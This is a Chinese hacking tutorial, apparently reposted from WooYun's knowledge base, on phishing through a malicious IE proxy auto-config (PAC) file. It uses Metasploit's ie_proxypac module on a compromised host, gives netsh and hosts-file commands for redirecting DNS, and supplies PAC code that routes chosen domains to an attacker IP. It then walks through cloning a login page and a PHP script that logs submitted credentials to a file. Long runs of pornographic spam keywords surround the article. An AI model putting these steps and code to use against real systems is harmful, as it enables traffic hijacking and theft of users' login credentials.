精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

通過.PAC(自動配置代理)文件進行網絡釣魚

安全 黑客攻防
本文主要介紹的是Metasploit中的一個模塊ie_proxypac。通過.PAC(自動配置代理)文件來完全控制IE的用戶流量。只需要修改PAC文件,攻擊者就能使受害者訪問的某個域名指向攻擊者的IP。雖然沒有修改DNS但是可以達到同樣的效果,且這種方式較為隱蔽。已經有很多人使用這種方式進行網絡釣魚。

0x00 常見網絡釣魚方式

攻擊者進行網絡釣魚的方式常有以下幾種:

1. 通過修改受害者hosts文件(C:\WINDOWS\system32\drivers\etc\hosts)來實現;

2. 通過修改受害者dns來實現;

3. 已經進入路由器,直接修改路由器的DNS。

羅列的并不全,之后遇到的話再補充,上述三種方式很常見。

修改HOSTS文件,即攻擊者修改受害者HOSTS文件為如下形式:

127.0.0.1 localhost x.x.x.x www.wooyun.com

這樣就受害者訪問www.wooyun.com會直接訪問到x.x.x.x。在msf中可以使用inject_host腳本來實現。

修改dns進行攻擊:

攻擊者可是使用如下命令修改受害者的dns地址(管理員身份執行):

C:\Windows\system32>netsh interface ip show interfaces       

Idx  Met   MTU   狀態          名稱
---  ---  -----  -----------  -------------------
  1   50 4294967295  connected    Loopback Pseudo-Interface 1
 10   10   1500  connected    本地連接       

C:\Windows\system32>netsh interface ip set dns "本地連接" static 192.168.1.100
C:\Windows\system32>ipconfig /all | findstr 192.168.1.100
   DNS 服務器  . . . . . . . . . . . : 192.168.1.100

這樣就修改了受害者的DNS地址,之后可以使用msf的 fakedns來架設dns服務器來修改域名的解析地址。

除了直接修改路由器的DNS地址的以上兩種方式在某些環境下還是有一些缺點的,例如,一些牛逼的AV會檢測到文件的修改而發出報警,除此之外,如果受害者所處內網環境中的防火墻或路由器攔截對外部的DNS請求,修改受害者DNS的攻擊方式并不能生效(因為攻擊者架設的DNS在外網環境下)。

0x01 通過PAC代理

本文主要介紹的是Metasploit中的一個模塊ie_proxypac。通過.PAC(自動配置代理)文件來完全控制IE的用戶流量。只需要修改PAC文件,攻擊者就能使受害者訪問的某個域名指向攻擊者的IP。雖然沒有修改DNS但是可以達到同樣的效果,且這種方式較為隱蔽。已經有很多人使用這種方式進行網絡釣魚。

下面是一個PAC文件示例:

function FindProxyForURL(url, host)
{
if (shExpMatch(host, "www.wooyun.org")) {
 return "PROXY 192.168.52.129:80; DIRECT";
}
if (shExpMatch(host, "www.baidu.com")) {
 return "PROXY 192.168.52.129:80; DIRECT";
}
}

這個文件的配置是當受害者訪問www.wooyun.com以及www.baidu.com時,他會直接請求到攻擊者ip( 192.168.52.129)。

詳細的PAC編寫請查看http://findproxyforurl.com/pac-functions/。

將以上腳本保存為test.pac,在獲取meterpreter會話的基礎上使用ie_proxypac腳本:

  1. meterpreter > background   
  2. [*] Backgrounding session 1...  
  3. msf > use post/windows/manage/ie_proxypac  
  4. msf post(ie_proxypac) > set session 1  
  5. session => 1  
  6. msf post(ie_proxypac) > set REMOTE_PAC http://192.168.52.129/test.pac  
  7. REMOTE_PAC => http://192.168.52.129/test.pac  
  8. msf post(ie_proxypac) > show options       
  9.    
  10. Module options (post/windows/manage/ie_proxypac):      
  11.    
  12.    Name           Current Setting         Required  Description  
  13.    ----           ---------------         --------  -----------  
  14.    AUTO_DETECT    false                           yes       Automatically detect settings.  
  15.    DISABLE_PROXY  false                           yes       Disable the proxy server.  
  16.    LOCAL_PAC                                      no        Local PAC file.  
  17.    REMOTE_PAC     http://192.168.52.129/test.pac  no        Remote PAC file. (Ex: http://192.168.1.20/proxy.pac)  
  18.    SESSION        1                               yes       The session to run this module on.  
  19. msf post(ie_proxypac) > exploit       
  20.    
  21. [*] Setting automatic configuration script from local PAC file ...  
  22. [+] Automatic configuration script configured...  
  23. [*] Post module execution completed     

之后打開ie,internet選項->連接->局域網設置:

 

Alt text

 

可以看到pac已經使用pac文件進行了代理。

代理盡量使用遠程代理,因為IE11默認禁止本地代理,如果使用本地代理,代理是無效的。詳情測試發現,如果連接了vpn,pac代理是失效的。

現在再訪問www.baidu.com,www.wooyun.org,會看到已經轉移到了我們制定的ip:

 

Alt text

 

0x02 能做什么

這里我們修改pac文件如下:

function FindProxyForURL(url, host)
{
if (shExpMatch(host, "www.wooyun.org")) {
 return "PROXY 192.168.52.129:80; DIRECT";
}
}

這里ip要改成自己的web的ip,如果受害者請求的網站host為 www.wooyun.org 時,滿足規則,然后跳轉到我們指定的ip地址,這里我們可以來構造釣魚。

打開wooyun,右鍵查看源代碼,將所有源代碼保存為index.html,放在網站根目錄下,因為當受害者請求 http://wooyun.org,其host為 wooyun.org 不滿足代理條件,就會直接請求,所以我們把源代碼中的www.wooyun.org,改為wooyun.org:

 

Alt text

 

然后找到url,src,href標簽,修改為http://wooyun.org/xxxx 的形式,比如

  1. <link href="/css/style.css?v=201501291909" rel="stylesheet" type="text/css"/> 

修改為

  1. <link href="http://wooyun.org/css/style.css?v=201501291909" rel="stylesheet" type="text/css"/> 

改完以后,基本上就算克隆成功了:

 

Alt text

 

下來要把登陸頁面的的源碼復制過來,打開http://www.wooyun.org/user.php?action=login,右鍵復制源碼,保存為user.php,放在網站根目錄下,修改源碼中的url,src,href。修改完之后,打開index.html文件,定位登錄,修改href為 user.php?action=login,修改以后此標簽為:

  1. <a href="user.php?action=login">登錄</a> | <a href="http://wooyun.org/user.php?action=register" class="reg">注冊</a> 

打開user.php,定位用戶登錄表單,修改表單action為post.php:

  1. <a href="#">用戶登錄</a></div>  
  2.         </div>  
  3. <form action="post.php" method="POST">    
  4. ..... 

在網站根目錄新建post.php,添加如下代碼:

  1. <?php $file = 'data.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=http://wooyun.org/user.php?action=login" /> 

這樣釣魚站就搭建好了。

當用戶登錄時:

 

Alt text

 

點擊登陸以后會跳轉到http://wooyun.org/user.php?action=login

 

Alt text

 

查看data.txt:

 

Alt text

 

只是簡單地一個示例,具體可以通過修改pac文件來實現控制瀏覽器是否進行代理。

0x03 小結

此種方式進行網絡釣魚,做的細致的話,很難被發現,而且隱蔽性好,缺點就是連接vpn以后代理將會失效。以上是個人的測試結果,請各位大牛指正。

責任編輯:藍雨淚 來源: 烏云知識庫
相關推薦

2024-05-24 14:39:33

2017-12-07 09:49:25

2023-12-14 15:34:19

2021-03-10 10:05:59

網絡釣魚攻擊黑客

2010-09-03 13:55:25

2017-09-14 15:55:20

2020-08-06 08:23:24

Nginx反向代理Web安全

2017-12-07 22:58:14

2021-08-29 21:58:58

釣魚攻擊微軟SharePoint

2017-02-17 07:12:24

2023-08-07 15:43:55

2023-08-02 19:51:33

2011-04-14 18:13:37

Imperva文件保護

2013-03-20 10:19:35

2010-09-02 13:37:13

2017-09-14 15:16:56

2023-03-27 21:20:33

2012-05-10 10:23:57

蘋果OS X 10.7正式發布

2025-02-21 15:39:26

2022-02-16 07:37:36

惡意文檔網絡釣魚攻擊
點贊
收藏

51CTO技術棧公眾號

人人妻人人爽人人澡人人精品| 中文字幕一区二区在线观看视频| 天堂在线中文网| 久久av一区二区三区| 中文字幕亚洲欧美日韩高清| 日韩精品视频网址| 色资源二区在线视频| 国产精品网友自拍| 风间由美久久久| 黄色av一区二区| 欧美午夜国产| 亚洲最新av在线网站| 亚洲妇女无套内射精| 黑人巨大亚洲一区二区久| 中文字幕在线一区免费| 国产综合色一区二区三区| 欧美另类高清videos的特点| 国语精品一区| 在线精品视频视频中文字幕| 中文字幕在线观看91| 78精品国产综合久久香蕉| 亚洲一区在线观看视频| 亚洲国产一区二区三区在线| 日韩专区第一页| 久久精品国产久精国产| 91国产视频在线| 欧洲第一无人区观看| 国产99久久| 欧美精品一区二区三区视频| 免费成年人高清视频| 欧美特黄aaaaaaaa大片| 亚洲成人在线免费| 一本一本久久a久久精品综合妖精| 亚洲国产精品视频在线| 久久国产综合精品| 日本免费一区二区三区视频观看| 九九热精彩视频| 亚洲澳门在线| 日韩一级裸体免费视频| 无码人妻精品一区二区中文| 国内精品偷拍| 日韩欧美高清在线| 亚洲最大天堂网| 91福利精品在线观看| 色偷偷88欧美精品久久久| 成人毛片一区二区| 成年人视频免费在线播放| 综合久久久久久久| 在线免费观看成人| 91精彩视频在线观看| 久久久影院官网| 久久精品美女| 欧美黄色小说| 久久久久久9999| 日本日本精品二区免费| 黄色片免费在线| 久久午夜羞羞影院免费观看| 久久综合一区二区三区| 污污网站免费在线观看| 91丨porny丨国产入口| 久久99九九| 青青青草原在线| 久久久精品国产免大香伊| 欧美日韩一区二区三| 国产三级电影在线| 中文字幕欧美国产| 中文字幕一区二区三区有限公司 | 日韩免费av电影| 精品999视频| 国产精品高潮呻吟久久| 国产日产欧美一区二区| 操喷在线视频| 欧美日韩午夜剧场| 国产精品亚洲二区在线观看| jizzjizz少妇亚洲水多| 91精品国产91久久久久久最新毛片| 免费高清视频在线观看| 国偷自产av一区二区三区| 亚洲免费视频观看| 国产美女网站视频| 国内久久精品| 国产精品都在这里| 国产成年妇视频| 北条麻妃国产九九精品视频| 欧美一区国产一区| 国产黄色小视频在线| 亚洲国产成人porn| 精品少妇无遮挡毛片| 综合久久伊人| 亚洲国产成人精品电影| 免费观看a级片| 中文在线播放一区二区| 91av福利视频| 国产精品高潮呻吟AV无码| 国产a精品视频| 视频一区亚洲| av影院在线| 欧美日韩亚洲不卡| 艳妇乳肉豪妇荡乳xxx| 大色综合视频网站在线播放| 欧美国产第一页| 51国产偷自视频区视频| 极品少妇xxxx精品少妇偷拍| 国产伦一区二区三区色一情| 国产系列在线观看| 亚洲国产一区二区三区| 少妇激情一区二区三区| 91麻豆精品国产91久久久久推荐资源| 亚洲人成人99网站| 久草免费在线视频观看| 免费黄网站欧美| 精品一区二区不卡| 国产一区久久精品| 色哟哟在线观看一区二区三区| 欧洲在线免费视频| 国产日产一区| 97久久久久久| www.综合色| 亚洲桃色在线一区| 精品少妇无遮挡毛片| 久久悠悠精品综合网| 欧美另类暴力丝袜| 伊人免费在线观看| 2020日本不卡一区二区视频| 国产精品18久久久久| 成人精品一区二区三区电影免费 | 国产精品99精品久久免费| 欧美一区二视频在线免费观看| 黄色小说在线播放| 91精品国产色综合久久不卡蜜臀| 欧美成人另类视频| 鲁大师成人一区二区三区| 痴汉一区二区三区| 污片在线免费观看| 91精品国产综合久久香蕉麻豆| 夫妇露脸对白88av| 日产国产欧美视频一区精品| 免费日韩电影在线观看| 极品视频在线| 亚洲国产成人91精品| 日韩精品――中文字幕| 丰满亚洲少妇av| 蜜臀av性久久久久蜜臀av| 日韩久久99| 日韩有码在线播放| 一级爱爱免费视频| 国产精品久久久久久久久久久免费看| 亚洲福利精品视频| 久久日文中文字幕乱码| 成人激情免费在线| 国产美女福利在线| 欧美一区二区美女| 久久久久久久福利| 香蕉视频黄色片| 国产欧美1区2区3区| 日韩中文字幕免费在线| 国产成人精品一区二区免费看京| 欧美在线一级va免费观看| 天天操天天操天天干| 婷婷激情综合网| 黄色a一级视频| 日产国产高清一区二区三区| 色大师av一区二区三区| 欧洲精品久久久久毛片完整版| 久久精品国产精品| 国内精品久久久久久久久久久| 亚洲精品少妇30p| 少妇熟女视频一区二区三区 | 国产一区二区三区不卡av| 97在线观看免费高清| 日韩精品一二| 欧美亚洲国产一区二区三区| 51精品免费网站| 成人h动漫精品一区二| 免费黄色福利视频| 日本精品三区| 91传媒视频免费| 国产传媒在线观看| 一本一本久久a久久精品牛牛影视| 这里只有久久精品视频| 亚洲视频图片小说| 97中文字幕在线观看| 天堂在线亚洲视频| av磁力番号网| 日韩一级电影| 国产情人节一区| 17videosex性欧美| 国产午夜精品全部视频播放| 国产精品国产一区二区三区四区 | 777米奇影视第四色| 国产欧美日韩在线观看视频| 欧洲国内综合视频| 精品无码久久久久国产| 国模套图日韩精品一区二区| 中文字幕日韩欧美精品在线观看| 精品久久久中文字幕人妻| 狠狠干狠狠久久| 污污的视频在线免费观看| 99精品国产91久久久久久| 中文av字幕在线观看| 午夜在线视频观看日韩17c| 中国人体摄影一区二区三区| 日韩美女毛片| 亚洲a成v人在线观看| 激情开心成人网| 久久久久久噜噜噜久久久精品| 成在在线免费视频| 欧美精品一区二区三| 国产精品无码天天爽视频| 欧美性生交xxxxxdddd| 欧美日韩综合一区二区| 欧美激情一区不卡| 国产精品无码一区二区三区免费 | 91精品中文字幕一区二区三区| 一级片中文字幕| 曰韩精品一区二区| 天堂资源在线视频| 久久综合九色综合久久久精品综合 | 美女网站色91| 国产二区视频在线播放| 欧美日韩国内| 懂色av一区二区三区四区五区| 在线日韩网站| 久久国产精品久久| 高潮久久久久久久久久久久久久| 国产精品尤物福利片在线观看| 欧美少妇精品| 久久久久久久久网站| 91精品久久久| 久久艳片www.17c.com| 国产黄色片在线播放| 日韩电影免费观看在线观看| 亚洲第一页在线观看| 欧美高清激情brazzers| 国产女优在线播放| 色94色欧美sute亚洲线路一久| 日韩欧美三级在线观看| 亚洲午夜久久久久久久久电影院| 99久久婷婷国产综合| 中文字幕在线观看不卡视频| 亚洲欧美va天堂人熟伦| 国产亚洲精品免费| 精品人伦一区二区三电影| 91视频精品在这里| 青青草视频播放| 99久久综合99久久综合网站| 国产熟女高潮一区二区三区| 99国产精品久久| 日韩国产高清视频在线| 精品人妻一区二区三区麻豆91| 6080yy午夜一二三区久久| 97超碰人人模人人人爽人人爱| 欧美日韩精品欧美日韩精品| 一级片在线观看视频| 欧美老肥妇做.爰bbww| 亚洲中文一区二区三区| 欧美老人xxxx18| av资源免费看| 欧美精品一区二区三区蜜桃视频| 少妇高潮一区二区三区69| 日韩的一区二区| www.中文字幕久久久| 精品国产一区二区三区久久| 岛国成人毛片| 欧美黑人xxxx| 色多多在线观看| 国产成人精品视频| 亚洲aⅴ网站| 高清免费日韩| 精品一区毛片| 中文字幕一区二区三区精彩视频| 在线电影一区二区| 无码av天堂一区二区三区| 国产一区二区三区成人欧美日韩在线观看| av网站在线观看不卡| 久久狠狠亚洲综合| 亚洲av无一区二区三区久久| www.亚洲色图| 婷婷色一区二区三区| 中文字幕在线播放不卡一区| 少妇人妻丰满做爰xxx| 无吗不卡中文字幕| 亚洲天堂一二三| 精品免费国产一区二区三区四区| 天天操天天爱天天干| 日韩中文字幕在线视频| 操喷在线视频| 国产精品青草久久久久福利99| 免费观看性欧美大片无片| 久久偷窥视频| 亚洲综合中文| 成人观看免费完整观看| 激情亚洲综合在线| 欧美精品欧美极品欧美激情| 国产精品天干天干在观线| 国产精品免费一区二区三区观看 | 少妇一级淫免费观看| 国产日韩欧美制服另类| 国产日韩欧美在线观看视频| 日韩欧美在线视频| 国产丰满美女做爰| 亚洲视频一区二区| 青春草在线免费视频| 国产精品久久久久久网站| 99ri日韩精品视频| 亚洲国产精品视频一区| 亚洲精品女人| www激情五月| 亚洲国产精品二十页| 日本在线观看视频网站| 91精品国产欧美日韩| 国产青青草在线| 69**夜色精品国产69乱| 视频二区欧美| 色播亚洲婷婷| 久久久久久一区二区| 国产污在线观看| 一区二区三区精品久久久| 亚洲无码久久久久| 亚洲老头老太hd| 国产理论在线| 国产精品国产三级欧美二区| 久久久久久免费视频| 亚洲无吗一区二区三区| 久久毛片高清国产| xxxx.国产| 精品91自产拍在线观看一区| a级网站在线播放| 91精品国产综合久久男男| 欧美性生活一级片| www.亚洲视频.com| 国产高清视频一区| 亚洲一级生活片| 欧美日韩在线播放一区| 亚洲1卡2卡3卡4卡乱码精品| 国产精品www网站| 免费看av成人| 日韩欧美在线播放视频| 91色porny蝌蚪| 91国产丝袜播放在线| 亚洲国产天堂久久综合网| 2018av在线| 久久精品日产第一区二区三区| 日韩午夜在线电影| 黄色在线免费播放| 五月天丁香久久| 青青草娱乐在线| 国产精品av在线播放| 欧美亚洲国产激情| 色婷婷综合网站| 亚洲欧洲国产专区| 99久久久国产精品无码免费| 麻豆国产精品va在线观看不卡 | 日本伊人午夜精品| 干b视频在线观看| 精品视频1区2区3区| 在线观看免费黄视频| 91久久久精品| 国产一区亚洲| 国产精品嫩草av| 色综合天天综合网天天狠天天| 你懂的视频在线观看| 国产精品99一区| 午夜伦全在线观看| 欧美系列在线观看| 在线视频婷婷| 不卡一区二区三区四区五区| 最新国产乱人伦偷精品免费网站| 日本少妇xxxx| 91国产视频在线观看| 日本电影在线观看网站| 亚洲最大成人网色| 亚洲乱码视频| 亚洲а∨天堂久久精品2021| 在线成人高清不卡| 91老司机福利在线| 欧洲av一区| 国产乱码精品一区二区三区忘忧草| 久久久久久久极品内射| 精品亚洲精品福利线在观看| 成人国产精品入口免费视频| 好吊色视频988gao在线观看| av亚洲产国偷v产偷v自拍| 波多野结衣视频免费观看| 久久国产精品网站| 免费成人三级| 天天影视色综合| 午夜精品久久久久久久久久| 成人p站proumb入口| 成人性色av| 日韩国产在线观看一区| 久草福利资源在线观看| 国产一区二区三区欧美| 日本精品在线观看| 久久久久久香蕉| 成人sese在线| 91成人国产综合久久精品| 69av在线播放| 欧美91大片| 亚洲色图欧美色|